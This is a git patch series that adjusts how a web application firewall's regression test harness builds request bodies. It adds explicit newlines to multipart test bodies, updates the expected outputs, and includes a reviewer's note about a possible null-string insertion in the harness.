From a5a3db940f04e9c721c610a2da2c4872c05a7f93 Mon Sep 17 00:00:00 2001 From: Hiroaki Nakamura Date: Sun, 25 Jan 2026 20:00:01 +0900 Subject: [PATCH 01/29] Do not add newline to test body Lines This is needed to test edge cases like a body missing the final newline, for example: [ "a\r\n", "b\r" ] And it is clearer than to add implicit newline to each line except the final line. --- test/regression/regression_test.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/test/regression/regression_test.cc b/test/regression/regression_test.cc
index 01ad2aacc9..8df1d1c035 100644
--- a/test/regression/regression_test.cc
+++ b/test/regression/regression_test.cc
@@ -48,7 +48,7 @@ inline std::string RegressionTest::yajl_array_to_str(const yajl_val &node) {
 for (int z = 0; z < node->u.array.len; z++) {
 yajl_val val3 = node->u.array.values[z];
 const char *key = YAJL_GET_STRING(val3);
- i << key << "\n";
+ i << key;
 }
 return i.str();
 }
From d7cad9506f43610997da5e4e4021c9b6309ef55d Mon Sep 17 00:00:00 2001 
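Review bot: `key` is streamed without a null check in the loop of yajl_array_to_str: `YAJL_GET_STRING(val3)` yields NULL when an array element is not a JSON string, and inserting a null `const char *` into a stream is undefined behaviour (some standard libraries set badbit and silently drop all later output, others crash). Now that every entry is meant to be the exact bytes of the request body, a mistyped element would produce a truncated body and a regression test that passes or fails for the wrong reason; a guard before `i << key;`, such as `if (!YAJL_IS_STRING(val3)) continue;` or preferably a reported test-file error, would make that visible. The C-string insertion also stops at the first NUL byte, so a body line containing `\u0000` presumably cannot be expressed this way; a comment such as `// entries are emitted verbatim: no newline is appended, embedded NULs are not supported` would document the new contract. The function's opening lines (including the declaration of `i`) are outside the hunk.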
From: Hiroaki Nakamura Date: Sun, 25 Jan 2026 21:02:11 +0900 Subject: [PATCH 02/29] Add needed newlines in test request body lines or adjust tests --- .../regression/action-tnf-base64.json | 2 +- test/test-cases/regression/auditlog.json | 2 +- .../regression/config-body_limits.json | 36 +- test/test-cases/regression/issue-1825.json | 142 +-- test/test-cases/regression/issue-2427.json | 38 +- .../regression/offset-variable.json | 538 +++++------ .../regression/operator-fuzzyhash.json | 124 +-- .../request-body-parser-multipart-crlf.json | 30 +- .../request-body-parser-multipart.json | 856 +++++++++--------- test/test-cases/regression/rule-920120.json | 30 +- .../variable-ARGS_COMBINED_SIZE.json | 6 +- .../regression/variable-ARGS_NAMES.json | 18 +- .../regression/variable-ARGS_POST_NAMES.json | 36 +- .../test-cases/regression/variable-FILES.json | 60 +- .../variable-FILES_COMBINED_SIZE.json | 30 +- .../regression/variable-FILES_NAMES.json | 30 +- .../regression/variable-FILES_SIZES.json | 30 +- .../variable-FULL_REQUEST_LENGTH.json | 30 +- .../variable-MULTIPART_CRLF_LF_LINES.json | 60 +- .../variable-MULTIPART_FILENAME.json | 64 +- ...able-MULTIPART_INVALID_HEADER_FOLDING.json | 22 +- .../regression/variable-MULTIPART_NAME.json | 64 +- .../variable-MULTIPART_PART_HEADERS.json | 40 +- .../variable-MULTIPART_STRICT_ERROR.json | 190 ++-- ...variable-MULTIPART_UNMATCHED_BOUNDARY.json | 30 +- .../variable-REQBODY_PROCESSOR_ERROR.json | 28 +- .../regression/variable-REQUEST_BODY.json | 30 +- .../variable-REQUEST_BODY_LENGTH.json | 30 +- .../variable-RESPONSE_CONTENT_LENGTH.json | 2 +- 29 files changed, 1298 insertions(+), 1300 deletions(-) diff --git a/test/test-cases/regression/action-tnf-base64.json b/test/test-cases/regression/action-tnf-base64.json index 7cb047ce2f..157ddde3c7 100644 --- a/test/test-cases/regression/action-tnf-base64.json +++ b/test/test-cases/regression/action-tnf-base64.json 
@@ -36,7 +36,7 @@ ] }, "expected":{ - "debug_log": "t:base64encode: \"dmFsdWUyCg==\"" + "debug_log": "t:base64encode: \"dmFsdWUy\"" }, "rules":[ "SecRuleEngine On", diff --git a/test/test-cases/regression/auditlog.json b/test/test-cases/regression/auditlog.json index 417f9950e4..a04867ef49 100644 --- a/test/test-cases/regression/auditlog.json +++ b/test/test-cases/regression/auditlog.json @@ -640,7 +640,7 @@ ] }, "expected": { - "audit_log": "\"body\":\"\\\\\\\\xc2\\\\\\\\xad=\\\\\\\\xc2\\\\\\\\xad\\\\\\\\x0a", + "audit_log": "\"body\":\"\\\\\\\\xc2\\\\\\\\xad=\\\\\\\\xc2\\\\\\\\xad", "debug_log": "", "error_log": "", "http_code": 403 diff --git a/test/test-cases/regression/config-body_limits.json b/test/test-cases/regression/config-body_limits.json index 5059f11ae6..b4e84517f5 100644 --- a/test/test-cases/regression/config-body_limits.json +++ b/test/test-cases/regression/config-body_limits.json @@ -698,15 +698,15 @@ "uri":"/", "method":"POST", "body": [ - "--0000", - "Content-Disposition: form-data; name=\"a\"", - "", - "1", - "--0000", - "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"", - "", - "2222222222222222222222222222222222222222222222222222222222222222222222", - "--0000--" + "--0000\n", + "Content-Disposition: form-data; name=\"a\"\n", + "\n", + "1\n", + "--0000\n", + "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"\n", + "\n", + "2222222222222222222222222222222222222222222222222222222222222222222222\n", + "--0000--\n" ] }, "response":{ 
@@ -753,15 +753,15 @@ "uri":"/", "method":"POST", "body": [ - "--0000", - "Content-Disposition: form-data; name=\"a\"", - "", - "1", - "--0000", - "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"", - "", - "2222222222222222222222222222222222222222222222222222222222222222222222", - "--0000--" + "--0000\n", + "Content-Disposition: form-data; name=\"a\"\n", + "\n", + "1\n", + "--0000\n", + "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"\n", + "\n", + "2222222222222222222222222222222222222222222222222222222222222222222222\n", + "--0000--\n" ] }, "response":{ diff --git a/test/test-cases/regression/issue-1825.json b/test/test-cases/regression/issue-1825.json index 41fc349ff8..ca9d4ca435 100644 --- a/test/test-cases/regression/issue-1825.json +++ b/test/test-cases/regression/issue-1825.json @@ -23,16 +23,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ 
@@ -71,16 +71,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename*= ISO-8859-1''ab0-_xy.txt; filename=\"ab0-_xy.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename*= ISO-8859-1''ab0-_xy.txt; filename=\"ab0-_xy.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -119,17 +119,17 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename*=utf-8''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--\r" - ] + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename*=utf-8''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\r\n" + ] }, "response":{ "headers":"", 
@@ -167,16 +167,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -215,16 +215,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=UTF-8'03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=UTF-8'03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ 
@@ -263,16 +263,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%4G.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%4G.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -311,16 +311,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%62.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%62.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/issue-2427.json b/test/test-cases/regression/issue-2427.json index 02f7b16f86..6b734af65e 100644 --- a/test/test-cases/regression/issue-2427.json 
+++ b/test/test-cases/regression/issue-2427.json @@ -24,25 +24,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"small2.txt\" ", - "Content-Type: text/plain", - "", - "This is another very small test file that contains the search content abcdef..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"small2.txt\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file that contains the search content abcdef..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ diff --git a/test/test-cases/regression/offset-variable.json b/test/test-cases/regression/offset-variable.json index 7ffe9299ba..b5c4ed99ff 100644 --- a/test/test-cases/regression/offset-variable.json +++ b/test/test-cases/regression/offset-variable.json 
@@ -985,21 +985,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1034,21 +1034,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1083,21 +1083,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1279,21 +1279,21 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1328,25 +1328,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1381,25 +1381,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1434,25 +1434,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1487,25 +1487,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1540,25 +1540,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1593,25 +1593,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1646,25 +1646,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1699,25 +1699,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
